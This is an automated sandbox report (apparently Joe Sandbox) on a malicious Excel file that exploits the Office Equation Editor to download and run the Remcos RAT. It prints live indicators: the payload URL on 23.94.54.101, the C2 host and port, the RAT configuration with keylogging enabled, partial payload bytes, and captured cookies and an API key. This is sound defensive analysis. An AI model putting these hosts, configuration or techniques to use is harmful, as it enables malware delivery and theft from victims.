Author: Joe Security: Data: Details: FD 44 4B 36 AE 9C E0 16 26 19 F5 A2 D6 C2 5C 1C 3F 2E 1E 22 74 EF 03 FE 4E CA 0A C8 28 C8 02 76 CE D4 34 45 AE BE CC E8 6F 0D CB 89 C3 D6 7F 35 0B 71 0A 11 71 35 61 80 1D 1C F9 6D 0A C2 5C 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3680, TargetObject: HKEY_CURRENT_USER\Software\Rmc-E70NOS\exepath

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 202404294766578200.xlam.xlsx

Avira: detected

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://23.94.54.101/GVV.exe	Avira URL Cloud: Label: malware

Found malware configuration

Source: 16.2.Bactris.exe.2990000.1.raw.unpack

Malware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for submitted file

Source: 202404294766578200.xlam.xlsx	ReversingLabs: Detection: 68%
Source: 202404294766578200.xlam.xlsx	Virustotal: Detection: 50%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\YED.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

17_2_00433837

Source: Bactris.exe, 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_64e20cd0-e

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.94.54.101 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\YED.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\YED.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_004074FD _wcslen,CoGetObject,

17_2_004074FD

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_1564_1766989274	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: Bactris.exe, 00000010.00000003.762094067.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Bactris.exe, 00000010.00000003.761995898.0000000002B10000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	3_2_0027DBBE
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0024C2A2 FindFirstFileExW,	3_2_0024C2A2
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002868EE FindFirstFileW,FindClose,	3_2_002868EE
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0028698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	3_2_0028698F
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_0027D076
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_0027D3A9
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00289642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00289642
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0028979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_0028979D
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	16_2_010EDBBE
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010BC2A2 FindFirstFileExW,	16_2_010BC2A2
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	16_2_010F698F
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F68EE FindFirstFileW,FindClose,	16_2_010F68EE
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_010ED076
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_010ED3A9
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_010F979D
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_010F9642
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	16_2_010F9B2B
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F5C97 FindFirstFileW,FindNextFileW,FindClose,	16_2_010F5C97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	17_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0044E879 FindFirstFileExA,	17_2_0044E879
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040783C FindFirstFileW,FindNextFileW,	17_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	17_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10006580 FindFirstFileExA,	17_2_10006580

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

17_2_00407C97

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350055E WriteFile,	2_2_0350055E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350045F CreateFileW,	2_2_0350045F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035004F6 WriteFile,	2_2_035004F6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035005E9 WriteFile,WinExec,ExitProcess,	2_2_035005E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500496 LoadLibraryW,	2_2_03500496
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350069C WinExec,ExitProcess,	2_2_0350069C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035003D0 CreateFileW,	2_2_035003D0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500254 CreateFileW,	2_2_03500254
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035002DF CreateFileW,	2_2_035002DF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500542 WriteFile,	2_2_03500542
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500244 CreateFileW,	2_2_03500244
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500249 CreateFileW,	2_2_03500249
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350024B CreateFileW,	2_2_0350024B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035002CB CreateFileW,	2_2_035002CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350044C CreateFileW,	2_2_0350044C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350034C CreateFileW,	2_2_0350034C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035002CE CreateFileW,	2_2_035002CE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035005CF WriteFile,	2_2_035005CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035002F5 CreateFileW,	2_2_035002F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500279 CreateFileW,	2_2_03500279
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035002EB CreateFileW,	2_2_035002EB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035003EC CreateFileW,	2_2_035003EC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350026D CreateFileW,	2_2_0350026D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500391 CreateFileW,	2_2_03500391
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500292 CreateFileW,	2_2_03500292
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500413 CreateFileW,	2_2_03500413
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350031A CreateFileW,	2_2_0350031A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350031F CreateFileW,	2_2_0350031F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500289 CreateFileW,	2_2_03500289
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350058F WriteFile,	2_2_0350058F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350028F CreateFileW,	2_2_0350028F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035003B7 ExitProcess,CreateFileW,	2_2_035003B7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035006BC ExitProcess,	2_2_035006BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0350033F CreateFileW,	2_2_0350033F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03500224 CreateFileW,	2_2_03500224
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035002A4 CreateFileW,	2_2_035002A4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035005AB WriteFile,	2_2_035005AB

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.94.53.100 2766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yuahdgbceja.sytes.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: yuahdgbceja.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49182 -> 23.94.53.100:2766

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 02 May 2024 08:28:48 GMTAccept-Ranges: bytesETag: W/"4ca767c16a9cda1:0"Server: Microsoft-IIS/8.5Date: Thu, 02 May 2024 02:54:52 GMTContent-Length: 1402368Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e5 c1 32 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 b6 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 15 00 00 04 00 00 a5 0f 16 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 b0 fb 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 fb 07 00 00 40 0d 00 00 fc 07 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 40 15 00 00 76 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL

Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0028CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

3_2_0028CE44

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /chrome/whats-new/m109?internal=true HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
